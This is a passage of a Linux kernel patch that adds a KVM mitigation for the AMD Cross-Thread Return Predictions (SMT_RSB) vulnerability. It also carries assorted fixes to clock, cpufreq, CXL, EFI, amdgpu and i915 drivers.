+ #define MMIO_SBDS	BIT(2)
+ /* CPU is affected by RETbleed, speculating where you would not expect it */
+ #define RETBLEED	BIT(3)
++/* CPU is affected by SMT (cross-thread) return predictions */
++#define SMT_RSB		BIT(4)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1266,8 +1268,8 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+-	VULNBL_AMD(0x17, RETBLEED),
+-	VULNBL_HYGON(0x18, RETBLEED),
++	VULNBL_AMD(0x17, RETBLEED | SMT_RSB),
++	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
+ 	{}
+ };
+ 
+@@ -1385,6 +1387,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	    !(ia32_cap & ARCH_CAP_PBRSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+ 
++	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
++		setup_force_cpu_bug(X86_BUG_SMT_RSB);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 69227f77b201d..a0c35b948c30b 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -192,6 +192,10 @@ module_param(enable_pmu, bool, 0444);
+ bool __read_mostly eager_page_split = true;
+ module_param(eager_page_split, bool, 0644);
+ 
++/* Enable/disable SMT_RSB bug mitigation */
++bool __read_mostly mitigate_smt_rsb;
++module_param(mitigate_smt_rsb, bool, 0444);
++
+ /*
+  * Restoring the host value for MSRs that are only consumed when running in
+  * usermode, e.g. SYSCALL MSRs and TSC_AUX, can be deferred until the CPU
+@@ -4435,10 +4439,15 @@ int kvm_vm_ioctl_check_extension(struct kvm *kvm, long ext)
+ 		r = KVM_CLOCK_VALID_FLAGS;
+ 		break;
+ 	case KVM_CAP_X86_DISABLE_EXITS:
+-		r |=  KVM_X86_DISABLE_EXITS_HLT | KVM_X86_DISABLE_EXITS_PAUSE |
+-		      KVM_X86_DISABLE_EXITS_CSTATE;
+-		if(kvm_can_mwait_in_guest())
+-			r |= KVM_X86_DISABLE_EXITS_MWAIT;
++		r = KVM_X86_DISABLE_EXITS_PAUSE;
++
++		if (!mitigate_smt_rsb) {
++			r |= KVM_X86_DISABLE_EXITS_HLT |
++			     KVM_X86_DISABLE_EXITS_CSTATE;
++
++			if (kvm_can_mwait_in_guest())
++				r |= KVM_X86_DISABLE_EXITS_MWAIT;
++		}
+ 		break;
+ 	case KVM_CAP_X86_SMM:
+ 		/* SMBASE is usually relocated above 1M on modern chipsets,
+@@ -6214,15 +6223,26 @@ split_irqchip_unlock:
+ 		if (cap->args[0] & ~KVM_X86_DISABLE_VALID_EXITS)
+ 			break;
+ 
+-		if ((cap->args[0] & KVM_X86_DISABLE_EXITS_MWAIT) &&
+-			kvm_can_mwait_in_guest())
+-			kvm->arch.mwait_in_guest = true;
+-		if (cap->args[0] & KVM_X86_DISABLE_EXITS_HLT)
+-			kvm->arch.hlt_in_guest = true;
+ 		if (cap->args[0] & KVM_X86_DISABLE_EXITS_PAUSE)
+ 			kvm->arch.pause_in_guest = true;
+-		if (cap->args[0] & KVM_X86_DISABLE_EXITS_CSTATE)
+-			kvm->arch.cstate_in_guest = true;
++
++#define SMT_RSB_MSG "This processor is affected by the Cross-Thread Return Predictions vulnerability. " \
++		    "KVM_CAP_X86_DISABLE_EXITS should only be used with SMT disabled or trusted guests."
++
++		if (!mitigate_smt_rsb) {
++			if (boot_cpu_has_bug(X86_BUG_SMT_RSB) && cpu_smt_possible() &&
++			    (cap->args[0] & ~KVM_X86_DISABLE_EXITS_PAUSE))
++				pr_warn_once(SMT_RSB_MSG);
++
++			if ((cap->args[0] & KVM_X86_DISABLE_EXITS_MWAIT) &&
++			    kvm_can_mwait_in_guest())
++				kvm->arch.mwait_in_guest = true;
++			if (cap->args[0] & KVM_X86_DISABLE_EXITS_HLT)
++				kvm->arch.hlt_in_guest = true;
++			if (cap->args[0] & KVM_X86_DISABLE_EXITS_CSTATE)
++				kvm->arch.cstate_in_guest = true;
++		}
++
+ 		r = 0;
+ 		break;
+ 	case KVM_CAP_MSR_PLATFORM_INFO:
+@@ -13730,6 +13750,7 @@ EXPORT_TRACEPOINT_SYMBOL_GPL(kvm_vmgexit_msr_protocol_exit);
+ static int __init kvm_x86_init(void)
+ {
+ 	kvm_mmu_x86_module_init();
++	mitigate_smt_rsb &= boot_cpu_has_bug(X86_BUG_SMT_RSB) && cpu_smt_possible();
+ 	return 0;
+ }
+ module_init(kvm_x86_init);
+diff --git a/drivers/clk/ingenic/jz4760-cgu.c b/drivers/clk/ingenic/jz4760-cgu.c
+index ecd395ac8a28d..e407f00bd5942 100644
+--- a/drivers/clk/ingenic/jz4760-cgu.c
++++ b/drivers/clk/ingenic/jz4760-cgu.c
+@@ -58,7 +58,7 @@ jz4760_cgu_calc_m_n_od(const struct ingenic_cgu_pll_info *pll_info,
+ 		       unsigned long rate, unsigned long parent_rate,
+ 		       unsigned int *pm, unsigned int *pn, unsigned int *pod)
+ {
+-	unsigned int m, n, od, m_max = (1 << pll_info->m_bits) - 2;
++	unsigned int m, n, od, m_max = (1 << pll_info->m_bits) - 1;
+ 
+ 	/* The frequency after the N divider must be between 1 and 50 MHz. */
+ 	n = parent_rate / (1 * MHZ);
+@@ -66,19 +66,17 @@ jz4760_cgu_calc_m_n_od(const struct ingenic_cgu_pll_info *pll_info,
+ 	/* The N divider must be >= 2. */
+ 	n = clamp_val(n, 2, 1 << pll_info->n_bits);
+ 
+-	for (;; n >>= 1) {
+-		od = (unsigned int)-1;
++	rate /= MHZ;
++	parent_rate /= MHZ;
+ 
+-		do {
+-			m = (rate / MHZ) * (1 << ++od) * n / (parent_rate / MHZ);
+-		} while ((m > m_max || m & 1) && (od < 4));
+-
+-		if (od < 4 && m >= 4 && m <= m_max)
+-			break;
++	for (m = m_max; m >= m_max && n >= 2; n--) {
++		m = rate * n / parent_rate;
++		od = m & 1;
++		m <<= od;
+ 	}
+ 
+ 	*pm = m;
+-	*pn = n;
++	*pn = n + 1;
+ 	*pod = 1 << od;
+ }
+ 
+diff --git a/drivers/clk/microchip/clk-mpfs-ccc.c b/drivers/clk/microchip/clk-mpfs-ccc.c
+index 32aae880a14f3..0ddc73e07be42 100644
+--- a/drivers/clk/microchip/clk-mpfs-ccc.c
++++ b/drivers/clk/microchip/clk-mpfs-ccc.c
+@@ -164,12 +164,11 @@ static int mpfs_ccc_register_outputs(struct device *dev, struct mpfs_ccc_out_hw_
+ 
+ 	for (unsigned int i = 0; i < num_clks; i++) {
+ 		struct mpfs_ccc_out_hw_clock *out_hw = &out_hws[i];
+-		char *name = devm_kzalloc(dev, 23, GFP_KERNEL);
++		char *name = devm_kasprintf(dev, GFP_KERNEL, "%s_out%u", parent->name, i);
+ 
+ 		if (!name)
+ 			return -ENOMEM;
+ 
+-		snprintf(name, 23, "%s_out%u", parent->name, i);
+ 		out_hw->divider.hw.init = CLK_HW_INIT_HW(name, &parent->hw, &clk_divider_ops, 0);
+ 		out_hw->divider.reg = data->pll_base[i / MPFS_CCC_OUTPUTS_PER_PLL] +
+ 			out_hw->reg_offset;
+@@ -201,14 +200,13 @@ static int mpfs_ccc_register_plls(struct device *dev, struct mpfs_ccc_pll_hw_clo
+ 
+ 	for (unsigned int i = 0; i < num_clks; i++) {
+ 		struct mpfs_ccc_pll_hw_clock *pll_hw = &pll_hws[i];
+-		char *name = devm_kzalloc(dev, 18, GFP_KERNEL);
+ 
+-		if (!name)
++		pll_hw->name = devm_kasprintf(dev, GFP_KERNEL, "ccc%s_pll%u",
++					      strchrnul(dev->of_node->full_name, '@'), i);
++		if (!pll_hw->name)
+ 			return -ENOMEM;
+ 
+ 		pll_hw->base = data->pll_base[i];
+-		snprintf(name, 18, "ccc%s_pll%u", strchrnul(dev->of_node->full_name, '@'), i);
+-		pll_hw->name = (const char *)name;
+ 		pll_hw->hw.init = CLK_HW_INIT_PARENTS_DATA_FIXED_SIZE(pll_hw->name,
+ 								      pll_hw->parents,
+ 								      &mpfs_ccc_pll_ops, 0);
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index 3c623a0bc147f..d10bf7635a0d5 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -137,40 +137,42 @@ static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
+ 	return lval * xo_rate;
+ }
+ 
+-/* Get the current frequency of the CPU (after throttling) */
+-static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
++/* Get the frequency requested by the cpufreq core for the CPU */
++static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
++	const struct qcom_cpufreq_soc_data *soc_data;
+ 	struct cpufreq_policy *policy;
++	unsigned int index;
+ 
+ 	policy = cpufreq_cpu_get_raw(cpu);
+ 	if (!policy)
+ 		return 0;
+ 
+ 	data = policy->driver_data;
++	soc_data = data->soc_data;
+ 
+-	return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
++	index = readl_relaxed(data->base + soc_data->reg_perf_state);
++	index = min(index, LUT_MAX_ENTRIES - 1);
++
++	return policy->freq_table[index].frequency;
+ }
+ 
+-/* Get the frequency requested by the cpufreq core for the CPU */
+-static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
++static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
+-	const struct qcom_cpufreq_soc_data *soc_data;
+ 	struct cpufreq_policy *policy;
+-	unsigned int index;
+ 
+ 	policy = cpufreq_cpu_get_raw(cpu);
+ 	if (!policy)
+ 		return 0;
+ 
+ 	data = policy->driver_data;
+-	soc_data = data->soc_data;
+ 
+-	index = readl_relaxed(data->base + soc_data->reg_perf_state);
+-	index = min(index, LUT_MAX_ENTRIES - 1);
++	if (data->throttle_irq >= 0)
++		return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
+ 
+-	return policy->freq_table[index].frequency;
++	return qcom_cpufreq_get_freq(cpu);
+ }
+ 
+ static unsigned int qcom_cpufreq_hw_fast_switch(struct cpufreq_policy *policy,
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index c4f32c32dfd50..9709bbf773b72 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -131,7 +131,7 @@ static int cxl_region_decode_reset(struct cxl_region *cxlr, int count)
+ 		struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
+ 		struct cxl_port *iter = cxled_to_port(cxled);
+ 		struct cxl_ep *ep;
+-		int rc;
++		int rc = 0;
+ 
+ 		while (!is_cxl_root(to_cxl_port(iter->dev.parent)))
+ 			iter = to_cxl_port(iter->dev.parent);
+@@ -143,7 +143,8 @@ static int cxl_region_decode_reset(struct cxl_region *cxlr, int count)
+ 
+ 			cxl_rr = cxl_rr_load(iter, cxlr);
+ 			cxld = cxl_rr->decoder;
+-			rc = cxld->reset(cxld);
++			if (cxld->reset)
++				rc = cxld->reset(cxld);
+ 			if (rc)
+ 				return rc;
+ 		}
+@@ -186,7 +187,8 @@ static int cxl_region_decode_commit(struct cxl_region *cxlr)
+ 			     iter = ep->next, ep = cxl_ep_load(iter, cxlmd)) {
+ 				cxl_rr = cxl_rr_load(iter, cxlr);
+ 				cxld = cxl_rr->decoder;
+-				cxld->reset(cxld);
++				if (cxld->reset)
++					cxld->reset(cxld);
+ 			}
+ 
+ 			cxled->cxld.reset(&cxled->cxld);
+@@ -991,10 +993,10 @@ static int cxl_port_setup_targets(struct cxl_port *port,
+ 		int i, distance;
+ 
+ 		/*
+-		 * Passthrough ports impose no distance requirements between
++		 * Passthrough decoders impose no distance requirements between
+ 		 * peers
+ 		 */
+-		if (port->nr_dports == 1)
++		if (cxl_rr->nr_targets == 1)
+ 			distance = 0;
+ 		else
+ 			distance = p->nr_targets / cxl_rr->nr_targets;
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index f9de5217ea65e..42282c5c3fe6a 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -20,10 +20,13 @@ static bool system_needs_vamap(void)
+ 	const u8 *type1_family = efi_get_smbios_string(1, family);
+ 
+ 	/*
+-	 * Ampere Altra machines crash in SetTime() if SetVirtualAddressMap()
+-	 * has not been called prior.
++	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
++	 * SetVirtualAddressMap() has not been called prior.
+ 	 */
+-	if (!type1_family || strcmp(type1_family, "Altra"))
++	if (!type1_family || (
++	    strcmp(type1_family, "eMAG") &&
++	    strcmp(type1_family, "Altra") &&
++	    strcmp(type1_family, "Altra Max")))
+ 		return false;
+ 
+ 	efi_warn("Working around broken SetVirtualAddressMap()\n");
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index d0d99ed607ddd..6fdb679321d0d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -564,7 +564,13 @@ void amdgpu_fence_driver_sw_fini(struct amdgpu_device *adev)
+ 		if (!ring || !ring->fence_drv.initialized)
+ 			continue;
+ 
+-		if (!ring->no_scheduler)
++		/*
++		 * Notice we check for sched.ops since there's some
++		 * override on the meaning of sched.ready by amdgpu.
++		 * The natural check would be sched.ready, which is
++		 * set as drm_sched_init() finishes...
++		 */
++		if (ring->sched.ops)
+ 			drm_sched_fini(&ring->sched);
+ 
+ 		for (j = 0; j <= ring->fence_drv.num_fences_mask; ++j)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index b5f3bba851db8..01e42bdd8e4e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -974,7 +974,7 @@ int amdgpu_vm_ptes_update(struct amdgpu_vm_update_params *params,
+ 			trace_amdgpu_vm_update_ptes(params, frag_start, upd_end,
+ 						    min(nptes, 32u), dst, incr,
+ 						    upd_flags,
+-						    vm->task_info.pid,
++						    vm->task_info.tgid,
+ 						    vm->immediate.fence_context);
+ 			amdgpu_vm_pte_update_flags(params, to_amdgpu_bo_vm(pt),
+ 						   cursor.level, pe_start, dst,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b425ec00817c4..988b1c947aefc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1193,24 +1193,38 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ 	memset(pa_config, 0, sizeof(*pa_config));
+ 
+-	logical_addr_low  = min(adev->gmc.fb_start, adev->gmc.agp_start) >> 18;
+-	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+-
+-	if (adev->apu_flags & AMD_APU_IS_RAVEN2)
+-		/*
+-		 * Raven2 has a HW issue that it is unable to use the vram which
+-		 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
+-		 * workaround that increase system aperture high address (add 1)
+-		 * to get rid of the VM fault and hardware hang.
+-		 */
+-		logical_addr_high = max((adev->gmc.fb_end >> 18) + 0x1, adev->gmc.agp_end >> 18);
+-	else
+-		logical_addr_high = max(adev->gmc.fb_end, adev->gmc.agp_end) >> 18;
+-
+ 	agp_base = 0;
+ 	agp_bot = adev->gmc.agp_start >> 24;
+ 	agp_top = adev->gmc.agp_end >> 24;
+ 
++	/* AGP aperture is disabled */
++	if (agp_bot == agp_top) {
++		logical_addr_low  = adev->gmc.vram_start >> 18;
++		if (adev->apu_flags & AMD_APU_IS_RAVEN2)
++			/*
++			 * Raven2 has a HW issue that it is unable to use the vram which
++			 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
++			 * workaround that increase system aperture high address (add 1)
++			 * to get rid of the VM fault and hardware hang.
++			 */
++			logical_addr_high = (adev->gmc.fb_end >> 18) + 0x1;
++		else
++			logical_addr_high = adev->gmc.vram_end >> 18;
++	} else {
++		logical_addr_low  = min(adev->gmc.fb_start, adev->gmc.agp_start) >> 18;
++		if (adev->apu_flags & AMD_APU_IS_RAVEN2)
++			/*
++			 * Raven2 has a HW issue that it is unable to use the vram which
++			 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
++			 * workaround that increase system aperture high address (add 1)
++			 * to get rid of the VM fault and hardware hang.
++			 */
++			logical_addr_high = max((adev->gmc.fb_end >> 18) + 0x1, adev->gmc.agp_end >> 18);
++		else
++			logical_addr_high = max(adev->gmc.fb_end, adev->gmc.agp_end) >> 18;
++	}
++
++	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+ 
+ 	page_table_start.high_part = (u32)(adev->gmc.gart_start >> 44) & 0xF;
+ 	page_table_start.low_part = (u32)(adev->gmc.gart_start >> 12);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index c06538c37a11f..55d63d860ef10 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3612,7 +3612,7 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 						(int)hubp->curs_attr.width || pos_cpy.x
+ 						<= (int)hubp->curs_attr.width +
+ 						pipe_ctx->plane_state->src_rect.x) {
+-						pos_cpy.x = temp_x + viewport_width;
++						pos_cpy.x = 2 * viewport_width - temp_x;
+ 					}
+ 				}
+ 			} else {
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 236657eece477..41635694e5216 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -1991,6 +1991,8 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
+ 		case IP_VERSION(9, 4, 2):
+ 		case IP_VERSION(10, 3, 0):
+ 		case IP_VERSION(11, 0, 0):
++		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 2):
+ 			*states = ATTR_STATE_SUPPORTED;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+index d6b964cf73bd1..4bc7aee4d44f8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+@@ -123,7 +123,8 @@
+ 									(1 << FEATURE_DS_FCLK_BIT) | \
+ 									(1 << FEATURE_DS_LCLK_BIT) | \
+ 									(1 << FEATURE_DS_DCFCLK_BIT) | \
+-									(1 << FEATURE_DS_UCLK_BIT))
++									(1 << FEATURE_DS_UCLK_BIT) | \
++									(1ULL << FEATURE_DS_VCN_BIT))
+ 
+ //For use with feature control messages
+ typedef enum {
+@@ -522,9 +523,9 @@ typedef enum  {
+   TEMP_HOTSPOT_M,
+   TEMP_MEM,
+   TEMP_VR_GFX,
+-  TEMP_VR_SOC,
+   TEMP_VR_MEM0,
+   TEMP_VR_MEM1,
++  TEMP_VR_SOC,
+   TEMP_VR_U,
+   TEMP_LIQUID0,
+   TEMP_LIQUID1,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
+index d6b13933a98fb..48a3a3952ceb3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
+@@ -113,20 +113,21 @@
+ #define NUM_FEATURES                          64
+ 
+ #define ALLOWED_FEATURE_CTRL_DEFAULT 0xFFFFFFFFFFFFFFFFULL
+-#define ALLOWED_FEATURE_CTRL_SCPM        (1 << FEATURE_DPM_GFXCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_GFX_POWER_OPTIMIZER_BIT) | \
+-                                         (1 << FEATURE_DPM_UCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_FCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_SOCCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_MP0CLK_BIT) | \
+-                                         (1 << FEATURE_DPM_LINK_BIT) | \
+-                                         (1 << FEATURE_DPM_DCN_BIT) | \
+-                                         (1 << FEATURE_DS_GFXCLK_BIT) | \
+-                                         (1 << FEATURE_DS_SOCCLK_BIT) | \
+-                                         (1 << FEATURE_DS_FCLK_BIT) | \
+-                                         (1 << FEATURE_DS_LCLK_BIT) | \
+-                                         (1 << FEATURE_DS_DCFCLK_BIT) | \
+-                                         (1 << FEATURE_DS_UCLK_BIT)
++#define ALLOWED_FEATURE_CTRL_SCPM	((1 << FEATURE_DPM_GFXCLK_BIT) | \
++					(1 << FEATURE_DPM_GFX_POWER_OPTIMIZER_BIT) | \
++					(1 << FEATURE_DPM_UCLK_BIT) | \
++					(1 << FEATURE_DPM_FCLK_BIT) | \
++					(1 << FEATURE_DPM_SOCCLK_BIT) | \
++					(1 << FEATURE_DPM_MP0CLK_BIT) | \
++					(1 << FEATURE_DPM_LINK_BIT) | \
++					(1 << FEATURE_DPM_DCN_BIT) | \
++					(1 << FEATURE_DS_GFXCLK_BIT) | \
++					(1 << FEATURE_DS_SOCCLK_BIT) | \
++					(1 << FEATURE_DS_FCLK_BIT) | \
++					(1 << FEATURE_DS_LCLK_BIT) | \
++					(1 << FEATURE_DS_DCFCLK_BIT) | \
++					(1 << FEATURE_DS_UCLK_BIT) | \
++					(1ULL << FEATURE_DS_VCN_BIT))
+ 
+ //For use with feature control messages
+ typedef enum {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index e8c6febb8b64e..992163e66f7b4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -28,11 +28,11 @@
+ #define SMU13_DRIVER_IF_VERSION_INV 0xFFFFFFFF
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x34
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x35
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_10 0x1D
+ 
+ #define SMU13_MODE1_RESET_WAIT_TIME_IN_MS 500  //500ms
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index cf96c3f2affe4..508e392547d7a 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -407,6 +407,9 @@ static int smu_v13_0_0_setup_pptable(struct smu_context *smu)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
++	if (amdgpu_sriov_vf(smu->adev))
++		return 0;
++
+ 	ret = smu_v13_0_0_get_pptable_from_pmfw(smu,
+ 						&smu_table->power_play_table,
+ 						&smu_table->power_play_table_size);
+@@ -1257,6 +1260,9 @@ static int smu_v13_0_0_get_thermal_temperature_range(struct smu_context *smu,
+ 		table_context->power_play_table;
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+ 
++	if (amdgpu_sriov_vf(smu->adev))
++		return 0;
++
+ 	if (!range)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index eea06939e7da1..5dfeab7b999b8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -124,6 +124,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
++	MSG_MAP(GetPptLimit,			PPSMC_MSG_GetPptLimit,                 0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index edbdb949b6ced..178a8cbb75838 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -2466,6 +2466,22 @@ static enum port dvo_port_to_port(struct drm_i915_private *i915,
+ 					  dvo_port);
+ }
+ 
++static enum port
++dsi_dvo_port_to_port(struct drm_i915_private *i915, u8 dvo_port)
++{
++	switch (dvo_port) {
++	case DVO_PORT_MIPIA:
++		return PORT_A;
++	case DVO_PORT_MIPIC:
++		if (DISPLAY_VER(i915) >= 11)
++			return PORT_B;
++		else
++			return PORT_C;
++	default:
++		return PORT_NONE;
++	}
++}
++
+ static int parse_bdb_230_dp_max_link_rate(const int vbt_max_link_rate)
+ {
+ 	switch (vbt_max_link_rate) {
+@@ -3406,19 +3422,16 @@ bool intel_bios_is_dsi_present(struct drm_i915_private *i915,
+ 
+ 		dvo_port = child->dvo_port;
+ 
+-		if (dvo_port == DVO_PORT_MIPIA ||
+-		    (dvo_port == DVO_PORT_MIPIB && DISPLAY_VER(i915) >= 11) ||
+-		    (dvo_port == DVO_PORT_MIPIC && DISPLAY_VER(i915) < 11)) {
+-			if (port)
+-				*port = dvo_port - DVO_PORT_MIPIA;
+-			return true;
+-		} else if (dvo_port == DVO_PORT_MIPIB ||
+-			   dvo_port == DVO_PORT_MIPIC ||
+-			   dvo_port == DVO_PORT_MIPID) {
++		if (dsi_dvo_port_to_port(i915, dvo_port) == PORT_NONE) {
+ 			drm_dbg_kms(&i915->drm,
+ 				    "VBT has unsupported DSI port %c\n",
+ 				    port_name(dvo_port - DVO_PORT_MIPIA));
++			continue;
+ 		}
++
++		if (port)
++			*port = dsi_dvo_port_to_port(i915, dvo_port);
++		return true;
+ 	}
+ 
+ 	return false;
+@@ -3503,7 +3516,7 @@ bool intel_bios_get_dsc_params(struct intel_encoder *encoder,
+ 		if (!(child->device_type & DEVICE_TYPE_MIPI_OUTPUT))
+ 			continue;
+ 
+-		if (child->dvo_port - DVO_PORT_MIPIA == encoder->port) {
++		if (dsi_dvo_port_to_port(i915, child->dvo_port) == encoder->port) {
+ 			if (!devdata->dsc)
+ 				return false;
+ 
+diff --git a/drivers/gpu/drm/i915/display/skl_watermark.c b/drivers/gpu/drm/i915/display/skl_watermark.c
+index 18178b01375e4..a7adf02476f6a 100644
+--- a/drivers/gpu/drm/i915/display/skl_watermark.c
++++ b/drivers/gpu/drm/i915/display/skl_watermark.c
+@@ -1587,7 +1587,8 @@ skl_crtc_allocate_plane_ddb(struct intel_atomic_state *state,
+ 				skl_check_wm_level(&wm->wm[level], ddb);
+ 
+ 			if (icl_need_wm1_wa(i915, plane_id) &&
+-			    level == 1 && wm->wm[0].enable) {
++			    level == 1 && !wm->wm[level].enable &&
++			    wm->wm[0].enable) {
+ 				wm->wm[level].blocks = wm->wm[0].blocks;
+ 				wm->wm[level].lines = wm->wm[0].lines;
+ 				wm->wm[level].ignore_lines = wm->wm[0].ignore_lines;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
